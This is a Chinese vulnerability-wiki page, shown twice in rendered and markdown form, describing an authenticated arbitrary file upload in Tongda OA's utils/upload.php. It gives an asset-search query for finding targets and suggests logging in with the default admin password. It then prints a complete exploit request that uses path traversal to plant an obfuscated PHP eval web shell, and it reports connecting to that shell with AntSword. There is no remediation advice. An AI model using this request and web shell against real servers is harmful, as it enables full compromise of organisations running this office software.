fofamini-wiki

登录白背景

源码

通达OA utils存在后台任意文件上传

一、漏洞简介

通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等，后台/general/data_center/utils/upload.php存在任意文件上传漏洞，用户可以通过上传任意文件到服务器中，并且可以借助上传的文件利用shell工具直接获得system权限。

二、影响版本

通达OA2017 -通达OAV11.6

三、资产测绘

hunterapp.name="通达 OA"

登录页面

四、漏洞复现

使用默认密码admin，密码为空或采用通达OA任意用户登录登录后台；

通过获取的cookie上传文件

POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.%3C%3E./.%3C%3E./.%3C%3E./ HTTP/1.1
Accept-Charset: GBK
Cookie: PHPSESSID=bdvsg4irn4bm2c34s9pr86kr35;_SERVER=
Cache-Control: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.7 Safari/537.36
Connection: close
Pragma: no-cache
Content-Type: multipart/form-data; boundary=********
Host: xx.xx.xx.xx
Content-Length: 225

--********
Content-Disposition: form-data; name="FILE1"; filename="shell1.php"

<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['x']);?>
--********

上传文件位置：http://xx.xx.xx.xx/_shell.php,使用蚁剑成功连接

原文: https://www.yuque.com/xiaokp7/ocvun2/abemqxq2sybovp5y

# 通达OA utils存在后台任意文件上传

# 一、漏洞简介
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等，后台`/general/data_center/utils/upload.php`存在任意文件上传漏洞，用户可以通过上传任意文件到服务器中，并且可以借助上传的文件利用shell工具直接获得system权限。

# 二、影响版本

- 通达OA2017 -通达OAV11.6

# 三、资产测绘

- hunter`app.name="通达 OA"`

![image.png](./img/B3cZyva_hh4eg068/1692175272185-2e2eccad-00b6-4598-a978-54d5b591d45a-568924.png)

- 登录页面

![image.png](./img/B3cZyva_hh4eg068/1692175288340-990aa042-3b09-4cd8-8ae2-c55104f1b974-177606.png)

# 四、漏洞复现

1. 使用默认密码admin，密码为空或采用通达OA任意用户登录登录后台；

![image.png](./img/B3cZyva_hh4eg068/1683387160692-68b96b0e-ece1-4182-9c8c-3547689af283-010913.png)

2. 通过获取的`cookie`上传文件
```java
POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.%3C%3E./.%3C%3E./.%3C%3E./ HTTP/1.1
Accept-Charset: GBK
Cookie: PHPSESSID=bdvsg4irn4bm2c34s9pr86kr35;_SERVER=
Cache-Control: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.7 Safari/537.36
Connection: close
Pragma: no-cache
Content-Type: multipart/form-data; boundary=********
Host: xx.xx.xx.xx
Content-Length: 225

--********
Content-Disposition: form-data; name="FILE1"; filename="shell1.php"

<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['x']);?>
--********

```
![image.png](./img/B3cZyva_hh4eg068/1691586480968-b7d73b4c-edfd-47d3-a575-7fea234a2674-176928.png)

3. 上传文件位置：`http://xx.xx.xx.xx/_shell.php`,使用蚁剑成功连接

![image.png](./img/B3cZyva_hh4eg068/1691586539019-7943e389-aa5b-4899-8746-7388025dafc3-682736.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/abemqxq2sybovp5y>